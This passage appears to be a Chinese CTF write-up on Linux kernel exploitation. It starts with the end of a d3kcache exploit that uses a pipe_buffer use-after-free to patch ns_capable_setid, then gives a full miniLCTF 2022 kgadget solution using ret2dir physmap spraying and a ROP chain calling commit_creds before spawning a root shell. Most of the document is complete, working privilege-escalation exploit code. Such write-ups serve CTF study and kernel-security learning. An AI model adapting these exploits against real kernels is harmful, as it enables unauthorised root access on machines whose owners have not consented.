err_exit("FAILED to create mmap area!");
}

/* because of lazy allocation, we need to write it manually */
for (int i = 0; i < 8; i++) {
kcode_map[i] = "arttnba3"[i];
kcode_map[i + 0x1000] = "arttnba3"[i];
}

/* overwrite kernel code seg to exec shellcode directly :) */
dst_vaddr = NS_CAPABLE_SETID + kernel_offset;
printf("\033[34m\033[1m[*] vaddr of ns_capable_setid is: \033[0m0x%lx\n",
dst_vaddr);

dst_paddr = vaddr_resolve_for_3_level(pgd_addr, dst_vaddr);
dst_paddr += 0x1000 * PTE_ENTRY(dst_vaddr);

printf("\033[32m\033[1m[+] Got ns_capable_setid's phys addr: \033[0m"
"0x%lx\n\n", dst_paddr);

/* remapping to our mmap area */
vaddr_remapping(pgd_addr, 0x114514000, dst_paddr);
vaddr_remapping(pgd_addr, 0x114514000 + 0x1000, dst_paddr + 0x1000);

/* overwrite kernel code segment directly */

puts("[*] Start overwriting kernel code segment...");

/**
* The setresuid() check for user's permission by ns_capable_setid(),
* so we can just patch it to let it always return true :)
*/
memset(kcode_map + (NS_CAPABLE_SETID & 0xfff), '\x90', 0x40); /* nop */
memcpy(kcode_map + (NS_CAPABLE_SETID & 0xfff) + 0x40,
"\xf3\x0f\x1e\xfa" /* endbr64 */
"H\xc7\xc0\x01\x00\x00\x00" /* mov rax, 1 */
"\xc3", /* ret */
12);

/* get root now :) */
puts("[*] trigger evil ns_capable_setid() in setresuid()...\n");

sleep(5);

setresuid(0, 0, 0);
get_root_shell();
}

/**
* Just for testing CFI's availability :)
*/
void trigger_control_flow_integrity_detection(void)
{
size_t buf[0x1000];
struct pipe_buffer *pbuf = (void*) ((size_t)buf + TRD_PIPE_BUF_SZ);
struct pipe_buf_operations *ops, *ops_addr;

ops_addr = (struct pipe_buf_operations*)
(((size_t) info_pipe_buf.page - vmemmap_base) / 0x40 * 0x1000);
ops_addr = (struct pipe_buf_operations*)((size_t)ops_addr+page_offset_base);

/* two random gadget :) */
ops = (struct pipe_buf_operations*) buf;
ops->confirm = (void*)(0xffffffff81a78568 + kernel_offset);
ops->release = (void*)(0xffffffff816196e6 + kernel_offset);

for (int i = 0; i < 10; i++) {
pbuf->ops = ops_addr;
pbuf = (struct pipe_buffer *)((size_t) pbuf + TRD_PIPE_BUF_SZ);
}

evil_2nd_buf.page = info_pipe_buf.page;
evil_2nd_buf.offset = 0;
evil_2nd_buf.len = 0;

/* hijack the 4th pipe pointing to 2nd pipe */
write(pipe_fd[self_3rd_pipe_pid][1],&evil_4th_buf,sizeof(evil_4th_buf));

/* hijack the 2nd pipe for arbitrary read, 3rd pipe point to 4th pipe */
write(pipe_fd[self_4th_pipe_pid][1],&evil_2nd_buf,sizeof(evil_2nd_buf));
write(pipe_fd[self_4th_pipe_pid][1],
temp_zero_buf,
TRD_PIPE_BUF_SZ - sizeof(evil_2nd_buf));

/* hijack the 3rd pipe to point to 4th pipe */
write(pipe_fd[self_4th_pipe_pid][1],&evil_3rd_buf,sizeof(evil_3rd_buf));

/* write data into dst page */
write(pipe_fd[self_2nd_pipe_pid][1], buf, 0xf00);

/* trigger CFI... */
puts("[=] triggering CFI's detection...\n");
sleep(5);
close(pipe_fd[self_2nd_pipe_pid][0]);
close(pipe_fd[self_2nd_pipe_pid][1]);
}

int main(int argc, char **argv, char **envp)
{
/**
* Step.O - fundamental works
*/

save_status();

/* bind core to 0 */
bind_core(0);

/* dev file */
dev_fd = open("/dev/d3kcache", O_RDWR);
if (dev_fd < 0) {
err_exit("FAILED to open /dev/d3kcache!");
}

/* spray pgv pages */
prepare_pgv_system();
prepare_pgv_pages();

/**
* Step.I - page-level heap fengshui to make a cross-cache off-by-null,
* making two pipe_buffer pointing to the same pages
*/
corrupting_first_level_pipe_for_page_uaf();

/**
* Step.II - re-allocate the victim page to pipe_buffer,
* leak page-related address and construct a second-level pipe uaf
*/
corrupting_second_level_pipe_for_pipe_uaf();

/**
* Step.III - re-allocate the second-level victim page to pipe_buffer,
* construct three self-page-pointing pipe_buffer
*/
building_self_writing_pipe();

/**
* Step.IV - leaking fundamental information by pipe
*/
info_leaking_by_arbitrary_pipe();

/**
* Step.V - different method of exploitation
*/

if (argv[1] && !strcmp(argv[1], "rop")) {
/* traditionally root by rop */
privilege_escalation_by_rop();
} else if (argv[1] && !strcmp(argv[1], "cfi")) {
/* extra - check for CFI's availability */
trigger_control_flow_integrity_detection();
} else if (argv[1] && !strcmp(argv[1], "usma")) {
privilege_escalation_by_usma();
}else {
/* default: root by seeking init_task and overwrite current */
privilege_escalation_by_task_overwrite();
}

/* we SHOULDN'T get there, so panic :( */
trigger_control_flow_integrity_detection();

return 0;
}

miniLCTF_2022-kgadget

启动脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
#!/bin/sh
qemu-system-x86_64 \
-m 256M \
-cpu kvm64,+smep,+smap \
-smp cores=2,threads=2 \
-kernel bzImage \
-initrd ./rootfs.cpio.gz \
-nographic \
-monitor /dev/null \
-snapshot \
-append "console=ttyS0 nokaslr pti=on quiet oops=panic panic=1" \
-no-reboot \
-s

可以发现关闭了kaslr,那么许多利用就十分方便了

分析一下模块,发现最主要的就是注册了ioctl

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
__int64 __fastcall kgadget_ioctl(__int64 a1, int a2)
{
void (__fastcall **v2)(void *, _QWORD); // rdx
void (__fastcall *v3)(void *, _QWORD); // rbx
void (__fastcall *v4)(void *, _QWORD); // rsi

_fentry__();
if ( a2 == 114514 )
{
v3 = *v2;
v4 = *v2;
printk(&unk_370);
printk(&unk_3A0);
qmemcpy(
(void *)(((unsigned __int64)&STACK[0xFE0] & 0xFFFFFFFFFFFFF000LL) - 168),
"arttnba3arttnba3arttnba3arttnba3arttnba3arttnba3",
48);
*(_QWORD *)(((unsigned __int64)&STACK[0xFE0] & 0xFFFFFFFFFFFFF000LL) - 112) = 0x3361626E74747261LL;
printk(&unk_3F8);
v3(&unk_3F8, v4);
return 0LL;
}
else
{
printk(&unk_420);
return -1LL;
}
}

发现其会主动破坏栈底的pt_regs结构体,仅保留r8,r9

之后调用rdx指向的函数指针

因此需要找到一段内存,将ROP链填充进去。

那么这段区域需要选取在哪里,若我们直接再用户空间中构造这段payload,接着将用户空间地址传递给ioctl是不可行的,因为内核开启了smapsmep的保护,因此对用户空间的访问都是不被允许的。

但其实我们并不需要显式地在内核空间布置数据,而是可以通过一个位于内核空间中的地址直接访问到用户空间中的数据——那就是映射了整个物理内存的 direct mapping area

我们为用户空间所分配的每一张内存页,在内核空间中都能通过这块内存区域访问到,因此我们只需要在用户空间布置恶意数据,之后再在内核空间的这块区域中找到我们的用户空间数据对应的内核空间地址即可,这便是 ret2dir ——通过内核空间地址访问到用户空间数据

但是这段内存十分庞大,有64TB的大小,我们怎么才能确保搜索到存放我们payload的地址呢?答案就是尽可能的填充,使得我们用户空间的payload尽可能的大,那么我们搜索到的几率也会增大。

别看这个内存这么大,但是调试就可以发现真正初始化了的并不算多

1
2
3
4
5
6
7
8
9
10
11
12
13
14
0xffff888000000000 0xffff888000099000 rw-p    99000      0 [pt_ffff888000000]
0xffff888000099000 0xffff88800009a000 r--p 1000 0 [pt_ffff888000099]
0xffff88800009a000 0xffff88800009b000 r-xp 1000 0 [pt_ffff88800009a]
0xffff88800009b000 0xffff888001000000 rw-p f65000 0 [pt_ffff88800009b]
0xffff888001000000 0xffff888001e03000 r--p e03000 0 [pt_ffff888001000]
0xffff888001e03000 0xffff888002000000 rw-p 1fd000 0 [pt_ffff888001e03]
0xffff888002000000 0xffff8880029f7000 r--p 9f7000 0 [pt_ffff888002000]
0xffff8880029f7000 0xffff88800302f000 rw-p 638000 0 [pt_ffff8880029f7]
0xffff88800302f000 0xffff888003030000 r--p 1000 0 [pt_ffff88800302f]
0xffff888003030000 0xffff888003b94000 rw-p b64000 0 [pt_ffff888003030]
0xffff888003b94000 0xffff888003b95000 r--p 1000 0 [pt_ffff888003b94]
0xffff888003b95000 0xffff8880051a8000 rw-p 1613000 0 [pt_ffff888003b95]
0xffff8880051a8000 0xffff8880051aa000 r--p 2000 0 [pt_ffff8880051a8]
0xffff8880051aa000 0xffff88800ffe0000 rw-p ae36000 0 [pt_ffff8880051aa]

而我们通过mmap映射的一般会出现在具有对应权限的段例如pt_ffff8880029f7pt_ffff8880051aa之类的

我们只要进行大量的页喷射,命中概率就会很大

因为15000个页就能占据0x3A98000的内存空间,那么在0xffff888000000000+0x7000000这附近命中率就很高了

如果不放心可以映射更多

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
#define _GNU_SOURCE
#include <unistd.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

size_t prepare_kernel_cred = 0xffffffff810c9540;
size_t commit_creds = 0xffffffff810c92e0;
size_t init_cred = 0xffffffff82a6b700;
size_t pop_rdi_ret = 0xffffffff8108c6f0;
size_t pop_rax_ret = 0xffffffff810115d4;
size_t pop_rsp_ret = 0xffffffff811483d0;
size_t swapgs_restore_regs_and_return_to_usermode = 0xffffffff81c00fb0 + 27;
size_t add_rsp_0xe8_pop_rbx_pop_rbp_ret = 0xffffffff812bd353;
size_t add_rsp_0xd8_pop_rbx_pop_rbp_ret = 0xffffffff810e7a54;
size_t add_rsp_0xa0_pop_rbx_pop_r12_pop_r13_pop_rbp_ret = 0xffffffff810737fe;
size_t ret = 0xffffffff8108c6f1;

void (*kgadget_ptr)(void);
size_t *physmap_spray_arr[16000];
size_t page_size;
size_t try_hit;
int dev_fd;

size_t user_cs, user_ss, user_rflags, user_sp;

void saveStatus(void)
{
__asm__("mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
printf("\033[34m\033[1m[*] Status has been saved.\033[0m\n");
}

void errExit(char * msg)
{
printf("\033[31m\033[1m[x] Error : \033[0m%s\n", msg);
exit(EXIT_FAILURE);
}

void getRootShell(void)
{
puts("\033[32m\033[1m[+] Backing from the kernelspace.\033[0m");

if(getuid())
{
puts("\033[31m\033[1m[x] Failed to get the root!\033[0m");
exit(-1);
}

puts("\033[32m\033[1m[+] Successful to get the root. Execve root shell now...\033[0m");
system("/bin/sh");
exit(0);// to exit the process normally instead of segmentation fault
}

void constructROPChain(size_t *rop)
{
int idx = 0;

// gadget to trigger pt_regs and for slide
for (; idx < (page_size / 8 - 0x30); idx++)
rop[idx] = add_rsp_0xa0_pop_rbx_pop_r12_pop_r13_pop_rbp_ret;

// more normal slide code
for (; idx < (page_size / 8 - 0x10); idx++)
rop[idx] = ret;

// rop chain
rop[idx++] = pop_rdi_ret;
rop[idx++] = init_cred;
rop[idx++] = commit_creds;
rop[idx++] = swapgs_restore_regs_and_return_to_usermode;
rop[idx++] = *(size_t*) "arttnba3";
rop[idx++] = *(size_t*) "arttnba3";
rop[idx++] = (size_t) getRootShell;
rop[idx++] = user_cs;
rop[idx++] = user_rflags;
rop[idx++] = user_sp;
rop[idx++] = user_ss;
}

int main(int argc, char **argv, char **envp)
{
saveStatus();

dev_fd = open("/dev/kgadget", O_RDWR);
if (dev_fd < 0)
errExit("dev fd!");

page_size = sysconf(_SC_PAGESIZE);

// construct per-page rop chain
physmap_spray_arr[0] = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
constructROPChain(physmap_spray_arr[0]);

// spray physmap, so that we can easily hit one of them
puts("[*] Spraying physmap...");
for (int i = 1; i < 15000; i++)
{
physmap_spray_arr[i] = mmap(NULL, page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
if (!physmap_spray_arr[i])
errExit("oom for physmap spray!");
memcpy(physmap_spray_arr[i], physmap_spray_arr[0], page_size);
}

puts("[*] trigger physmap one_gadget...");
//sleep(5);

try_hit = 0xffff888000000000 + 0x7000000;
__asm__(
"mov r15, 0xbeefdead;"
"mov r14, 0x11111111;"
"mov r13, 0x22222222;"
"mov r12, 0x33333333;"
"mov rbp, 0x44444444;"
"mov rbx, 0x55555555;"
"mov r11, 0x66666666;"
"mov r10, 0x77777777;"
"mov r9, pop_rsp_ret;" // stack migration again
"mov r8, try_hit;"
"mov rax, 0x10;"
"mov rcx, 0xaaaaaaaa;"
"mov rdx, try_hit;"
"mov rsi, 0x1bf52;"
"mov rdi, dev_fd;"
"syscall"
);
}